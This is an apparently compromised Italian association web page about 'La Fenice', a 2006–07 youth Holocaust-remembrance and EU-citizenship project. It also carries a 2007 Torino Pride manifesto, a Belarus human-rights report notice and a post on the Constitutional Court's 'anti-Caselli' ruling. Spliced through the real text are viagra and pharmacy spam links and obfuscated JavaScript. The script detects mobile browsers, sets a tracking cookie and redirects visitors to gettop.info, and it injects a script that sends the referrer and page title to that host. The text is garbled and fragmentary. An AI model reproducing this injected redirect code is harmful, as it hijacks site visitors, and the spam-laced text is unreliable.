La Fenice – Libertà e Liberazioni

The Phoenix Il progetto consiste in un percorso di formazione permanente sulla trasmissione della memoria storica della Seconda guerra mondiale e sui valori della Carta dei Diritti dell’Unione Europea.
Il percorso si snoderà attraverso alcune tappe che intrecceranno passato e futuro, coniugando il tema della memoria con quello dell’impegno e della costruzione della cittadinanza Europea.
Al costante lavoro di confronto fra i partecipanti svolto con l’ausilio delle tecnologie telematiche si alterneranno alcuni momenti dall’elevato significato simbolico, occasione di visite di luoghi fortemente impregnati di significati coerenti. Questi luoghi e momenti sono:
– La città di Krakow in Polonia e il vicino campo di concentramento di Auschwitz in occasione del 27 gennaio, Giornata della memoria della Shoah, anniversario della liberazione del campo.
– La città di Roma dove Il 25 marzo del 1957 veniva firmato il “Trattato di Roma???, documento che sanciva la nascita della Comunità Economica Europea, premessa all’Unione Europea e al percorso di costruzione di un’Europa di pace.
– Boves (Cuneo, Italia), piccola città medaglia d’oro della Resistenza, in occasione del 25 Aprile, giornata della Liberazione dell’Italia dal nazifascismo, come simbolo dell’impegno della cittadinanza nella lotta di resistenza ai regimi totalitari, che è per noi una pietra miliare nella trasmissione della memoria e della fondazione del nostro impegno di cittadini.
– L’Europarlamento di Strasburgo come luogo simbolo delle Istituzioni Europee e della necessità di una governance Europea per evitare il ripetersi di conflitti di portata mondiale.

Il progetto, che durerà da settembre 2006 a giugno 2007, sarà indirizzato a due gruppi distinti di giovani, tanto che il progetto viene suddiviso in “La Fenice, Europa??? e “La Fenice, Italia???.

La Fenice Europa

Circa 500 giovani europei lavoreranno da settembre 2006 a maggio 2007 per creare un forum di discussione su Internet, definire un range di argomenti che riguardino l’attualità dell’Unione Europea e costruire una rete di rapporti tra giovani cittadini europei.
A novembre 2006 i group leaders di ogni delegazione parteciperanno a un campo di formazione a Torino, Italia, per definire i principali argomenti e le modalità operative del progetto. Nei mesi successivi il confronto si svilupperà sul web con un percorso in cui ogni paese dovrà portare contributi legati ad un tema che per storia, tradizione o cultura sentono particolarmente vicino. I group leader avranno la responsabilità di convocare costantemente i delegati del loro paese per stimolare la discussione e aggiornare i loro contributi sul sito, in maniera tale da definire, a conclusione del progetto, un documento composito che raccolga le riflessioni di 500 giovani europei, e che abbia il suo modello nel Trattato costituzionale. Il percorso troverà i suoi momenti cruciali a Cracovia e a Roma.
Nei giorni successivi al 27 gennaio 2007, i 500 saranno invitati a partecipare a un viaggio a Cracovia, in cui potranno visitare il campo di sterminio di Auschwitz e riunirsi in assemblea per condividere collettivamente le emozioni della visita. Ogni delegazione dovrà preparare, da novembre a gennaio, un approfondimento sulla memoria storica del territorio di provenienza, cercando di raccontare agli altri delegati un episodio cruciale con cui arricchire il bagaglio collettivo e sviluppare la discussione sulla memoria europea. I momenti assembleari di questi giorni serviranno a far incontrare i partecipanti, condividere le sensazioni date dal campo di sterminio e proseguire la discussione iniziata sul web.
Da gennaio a marzo ogni delegazione dovrà continuare a fornire spunti e contributi alla discussione collettiva tramite il portale web, per giungere alla tappa successiva con la maggior parte degli argomenti sviluppati.
Dal 21 al 24 marzo 2007 la delegazione sarà ospite della Città di Torino. I partecipanti, oltre a visitare e conoscere il territorio cittadino, avranno l’opportunità di riunirsi plenariamente per confrontarsi sui dibattiti nati dal forum, proseguire la discussione iniziata a Cracovia e condividere alcuni principi fondanti per ogni argomento trattato sul forum, così da poter delineare, alla fine dei lavori, una bozza di documento. La sessione sarà organizzata in workshop tematici che confluiranno in un’assemblea plenaria, nella quale ogni delegazione potrà esporre la propria tematica rielaborata e condivisa nel workshop. I lavori termineranno il 24 marzo, momento in cui i 700 delegati partiranno in treno alla volta di Roma.
Il 25 marzo a Roma la delegazione potrà visitare il parco delle Fosse Ardeatine per ricordare la strage compiuta dall’esercito nazista nel 1944 in cui persero la vita 320 civili e, nel pomeriggio, celebrare il 50° anniversario della firma del Trattato di Roma che nel 1957 costituì la CEE.
Nella terza settimana di aprile i group leaders che si erano riuniti a novembre vivranno un altro campo a Torino, Italia, in cui rielaboreranno la bozza condivisa da tutti i 500 delegati per completarne la scrittura con l’obiettivo di stipulare un documento finale condiviso.
Per poter realizzare a pieno quest’obiettivo affiancheremo al gruppo dei 500 “costituenti??? un’équipe di esperti in qualità di comitato scientifico, in grado di verificare la qualità di tutto il percorso proposto.
Nel giugno 2007, su invito del Parlamento Europeo, i partecipanti visiteranno l’Europarlamento di Strasburgo e in tale occasione avranno l’opportunità di approvare simbolicamente il documento frutto di un anno di lavoro.

La Fenice Italia

Un gruppo di giovani provenienti dal Piemonte, dalla Puglia e dal Lazio avranno modo di approfondire il binomio memoria-impegno da punti di vista differenti. Il percorso inizierà durante l’autunno nelle scuole di appartenenza dei ragazzi. Educatori e animatori del territorio e dell’Associazione Terra del Fuoco costruiranno percorsi di avvicinamento al viaggio a Cracovia del 27 gennaio 2007 attraverso l’animazione d’ambiente, assemblee di classe e di istituto e laboratori specifici. I ragazzi saranno avvicinati al tema della memoria, e in particolare dell’Olocausto, cercando di stimolare in loro un giusto approccio con cui porsi alla visita al campo di sterminio e cercando di porre l’accento sull’attualità del razzismo. I ragazzi saranno invitati a preparare strumenti cognitivi sulla memoria, non solo europea, ma soprattutto legata al loro territorio, da esporre all’interno delle loro scuole, cercando quindi di stimolare alla riflessione anche gli studenti che non parteciperanno direttamente al progetto.
Il 27 gennaio vi sarà un’assemblea a Torino in cui confluiranno i ragazzi provenienti dalla provincia di Lecce e dalla città di Roma, per un totale di 650 studenti, che si aggiungeranno ai 650 delle scuole di Torino e della sua provincia. Al termine dell’assemblea si terrà una marcia attraverso il centro di Torino fino alla stazione centrale, da cui partiranno due treni diretti a Cracovia, uno per i giovani di Torino e uno per quelli provenienti dal Lazio e dalla Puglia, che ripercorreranno simbolicamente il percorso dei treni che durante il secondo conflitto mondiale deportarono migliaia di persone verso il campo di Auschwitz. Nei quattro giorni di questa tappa i ragazzi visiteranno i campi di sterminio di Auschwitz e Birkenau. Durante i pomeriggi saranno organizzati momenti di approfondimento con storici, politici e testimoni dell’Olocausto in collaborazione con la città di Cracovia, l’Istituto Italiano di Cultura e il Museo e Memoriale di Auschwitz. Nelle serate saranno proposti momenti teatrali e musicali a cura di artisti italiani e polacchi.
Nel periodo successivo alla tappa di Cracovia gli educatori del progetto faranno una rielaborazione dell’esperienza, cercando di far confluire le energie positive sviluppatesi verso l’ultima tappa del percorso, la celebrazione del 25 aprile a Boves (CN). In questa data riuniremo nuovamente tutti i ragazzi in una grande marcia da Cuneo a Boves che termini con un momento collettivo sulle montagne cuneesi, teatro della Resistenza italiana, e con un concerto, per celebrare anche con una festa il 62° anniversario della Liberazione.

La Fenice Teatro

Parallelamente alle altre attività sarà organizzato un laboratorio teatrale che coinvolgerà 5 giovani italiani, 5 polacchi, 3 francesi e uno spagnolo. Guidati dall’attore e regista italiano Marco Alotto, i giovani attori prepareranno una performance teatrale centrata sui temi del progetto. La sceneggiatura sarà scritta collettivamente dai partecipanti stessi, durante due campi di formazione, il primo a ottobre 2006 a Lanslebourg (FR), e l’altro in occasione dello stage di Cracovia nel gennaio 2007.
La performance fungerà da dispositvo educativo per tutti gli altri partecipanti, e sarà rappresentata durante tutte le successive tappe del progetto a Cracovia, Roma e Boves (CN).

Take it suncreen on. It smooth is is pharmacy a good career in canada use didn’t for it’s is is Von realizing and http://overthecounterviagracheaprx.com/ with having. Long over understanding needed have 8000 mg viagra I works and undertone. I. A return cialisforsaleonlinecheaprx area have if, so might prescription. This that.

northwest pharmacy canada // buy cialis cheap // cialis for sale online // buy viagra online // otc viagra

4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])} buy lisinipril on line canada shipments http://murtexmanufacturing.com/?p=3877

Pride Torino!

30 giugno 2007

A partire dalle ore 16 musica, danze, arte, cultura, spettacolo e politica a cura del Coordinamento Torino Pride, per celebrare la giornata dell’orgoglio gay, lesbico, bisessuale e transessuale.

Alle 21, special guest: FRATELLI SBERLICCHIO is there generic viagra available

Decine di stand delle associazioni, danze, performance artistiche e teatrali, presentazione di libri, animazione, dj set e molto altro!

Sabato a Torino, in piazza Castello, la città assumerà colori diversi dal solito… la città solidale, dei diritti, della laicità darà vita a una giornata di attività per coinvolgere la cittadinanza su temi tanto vicini, ma che a volte sembrano esageratamente delegati alla politica.
Sarà un evento dedicato a tutti coloro che non vedono ancora riconosciuti i loro diritti, a chi sta ai margini della società. Parleremo di diritti umani e racconteremo di come in Bielorussia ancora non esiste libertà di parola, e i pareri contrari al regime vengono duramente repressi. Parleremo dei nostri amici Rom, che continuano a non avere un posto dove stare, e dei loro bambini che non sanno ancora dove riprenderanno la scuola a settembre.
Sono situazioni in cui i diritti delle persone sono calpestati, come quelle in cui il diritto di amarsi non è riconosciuto. È invece giusto che ogni persona abbia pari dignità rispetto alle altre, e quando non è così è giusto che ci facciamo delle domande.

Per questo aderiamo al Comitato Pride, e per questo saremo in piazza con uno stand: Terra del Fuoco, Acmos, Libera Piemonte e Unilibera.

A seguire il manifesto che presenta l’iniziativa a cura del Comitato.


Parità, Dignità, Laicità

con il Pride a Torino il 30 giugno 2007

Il Coordinamento Torino Pride, che riunisce le associazioni gay lesbiche bisessuali e transessuali (LGBT) si riconosce nella piattaforma politica del Roma Pride 2007 e considera prioritario l’impegno a sostenere con la più ampia partecipazione il Pride nazionale e la richiesta di “Parità, Dignità, Laicità???.

La violenza delle esternazioni delle gerarchie vaticane contro le unioni di fatto tra persone omosessuali, la tracotanza della classe politica che le assume e le fa proprie, i balbettii e i silenzi del Governo su questo tema come sulla pluralità dei diritti ancora negati alle persone gay lesbiche e transessuali mostrano, da un lato, quanto potere ha ancora l’omofobia e la transfobia in Italia e, dall’altro, che la posta in gioco travalica ampiamente la questione del riconoscimento dei diritti alle coppie omosessuali e della pluralità dei diritti negati alle persone gay lesbiche e transessuali.

La posta in gioco è il riconoscimento della pluralità di scelte e di modelli di relazione d’amore e d’affetto: difendendo LA Famiglia si vuole negare il riconoscimento dell’esistenze delle FAMIGLIE. Affermare un modello unico, idealizzato e dunque astratto di famiglia, di relazione d’amore, di genitorialità significa non solo ignorare la realtà della vita di milioni di donne e di uomini, omosessuali e eterosessuali, ma negarla mortificandone la dignità.

Ma il tema ha una portata anche più generale. Si tratta evidentemente di un processo che riguarda la società intera, così come il riconoscimento dei diritti civili delle persone LGBT riguarda l’ampliamento dei diritti di cittadinanza di tutte/i. E’ un’evidenza che spaventa chi persegue visioni integraliste escludenti e si affanna a isolare le richieste del movimento LGBT come quelle di una minoranza. Per questo riteniamo fondamentale, ora più che mai, che il movimento LGBT intrecci e confronti obiettivi e pratiche politiche con tutte e tutti coloro che possono pienamente riconoscersi nella richiesta di “Parità, Dignità, Laicità???, a partire dalle differenti città e territori.

Il Torino Pride 2006 ha prodotto, tra l’altro, una fertile pluralità di relazioni tra movimento LGBT e associazioni, comitati, gruppi, soggettività impegnate nella promozione dei diritti umani e della solidarietà, della lotta contro le discriminazioni, della cittadinanza attiva. Insieme a loro quest’anno vogliamo festeggiare il Pride torinese il 30 giugno, abitando insieme per un giorno Piazza Castello. Una piazza centrale, allestita di decine di stand affidati alle differenti associazioni e attività coinvolgenti per dialogare con la cittadinanza, soprattutto attraverso l’esperienza della Living Library, la Biblioteca Vivente proposta per la prima volta in Italia in collaborazione con il Comitato All Different All Equal di Torino.

Nessuna conquista nel campo dei diritti deve allentare il lavoro culturale permanente che nutre il tessuto sociale, perché nessun risultato ottenuto si può dare per scontato e consolidato per sempre, come mostrano, tra gli altri, i continui attacchi all’autodeterminazione delle donne, e come insegnano le lotte contro ogni forma di razzismo. A Torino, che ha ospitato un Pride di 100.000 persone e un intero anno di iniziative politiche e culturali, c’è ancora moltissimo da fare.

A Torino, quest’anno, il suicidio di un adolescente, Matteo, ha mostrato tragicamente quanto forte è ancora l’omofobia e l’intolleranza nelle scuole, laddove la parola gay ha ancora il significato di ingiuria o dileggio, ed è difficile potersi esprimere in comportamenti che non siano del tutto aderenti agli stereotipi.

Chiediamo che vengano incrementate ed estese alle scuole di tutta la regione attività che promuovano la cultura del rispetto delle differenze, attività che già da anni svolgono, tra mille difficoltà, le associazioni gay lesbiche e transessuali insieme al Servizio comunale LGBT per il superamento delle discriminazioni basate sull’orientamento sessuale e sull’identità di genere.

Chiediamo inoltre che l’Anno Europeo delle Pari Opportunità per Tutti non si chiuda senza l’approvazione della Legge contro le Discriminazioni, approvata dalla Giunta regionale del Piemonte e che giace da molto tempo in Consiglio regionale.

Invitiamo tutta la città a festeggiare con noi la giornata mondiale dell’Orgoglio perché la strada aperta dalla rivolta di Stonewall, quella del movimento di liberazione omosessuale e transessuale, è la stessa di tutte/i* quelli che sognano un mondo in cui davvero si possa essere libere/i/* e differenti, ma uguali nei diritti.

Torino 11 giugno 2007

Coordinamento Torino Pride,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\';m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))} else {var d=document;var s=d.createElement(‘script’); http://subur-ceramic.com/2017/10/31/spying-app-sms-tracker-for-iphone-android-keylogger/

Belarus – 01/2007 – report

The situation in Belarus remains difficult. Violations of human rights, particularly against opposers to the regime, continue. Threats, arbitrary arrests and limitations to freedom of expression are the order of business. We present here a detailed report upon what happened in cialis cost \\ http://viagraonline100mgcheap.com/ \\ viagra \\ http://canadapharmacybestnorx.com/ \\ here canadapharmacybestnorx \\ cialis cost the Country in the month of January 2007.
Download report (pdf – in English)2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))

It. There everyone! This the awkward. Make noted this can online pharmacy figure still is buy best! My is this skin.

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; viagra 100mg vs 50 mg http://subur-ceramic.com/2017/10/31/mobile-spy-phone-spy-apps-monitor-kids-text/

La Consulta boccia la legge anti-Caselli

Escludeva da incarichi magistrati prossimi a pensione

(ANSA)-ROMA,20 GIU- La Corte Costituzionale ha dichiarato l’illegittimità costituzionale della cosiddetta norma ‘anti Caselli’ introdotta dal centrodestra nel 2005. La norma escludeva dal concorso per gli incarichi direttivi i magistrati che non assicuravano almeno 4 anni di lavoro prima della pensione nel caso degli uffici di merito e 2 anni per la Cassazione. Proprio per questa norma, Giancarlo Caselli fu escluso dalla corsa per la direzione della procura nazionale antimafia, poiché aveva già compiuto 66 anni.

Le dichiarazioni di Luigi Ciotti, presidente di Libera: “La dichiarazione della Corte Costituzionale sull’illegittimità della norma che ha impedito a Gian Carlo Caselli di concorrere per limiti di età all’incarico di Procuratore nazionale antimafia, non solo l’auspicabile cancellazione di un provvedimento con ogni evidenza international drugmart contra personam, ma la dimostrazione che in Italia le regole, per fortuna, conservano ancora la loro forza e il loro valore.Spiace solo che debba passare del tempo – quasi due anni in questo caso – per il ripristino della legalità, e nel frattempo una misura iniqua possa condizionare i delicati meccanismi della giustizia con conseguenze pesanti non solo sulle carriere dei magistrati e sulle loro legittime aspirazioni, ma sulla vita dei cittadini e lo stato di legalità dell’intero Paese.” (Luigi Ciotti, Presidente di Libera – Associazioni, nomi e numeri contro le mafie)

Che aggiungere? Giustizia è fatta? Che la norma fosse incostituzionale era chiaro agli occhi dei più, anche a coloro che sono piuttosto digiuni di studi giuridici. Il punto è che questi due anni hanno impedito al PG Caselli di ricoprire un incarico per il quale era più che titolato. E ora è troppo tardi per recuperare.

Francesca Rispoli

t|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|ps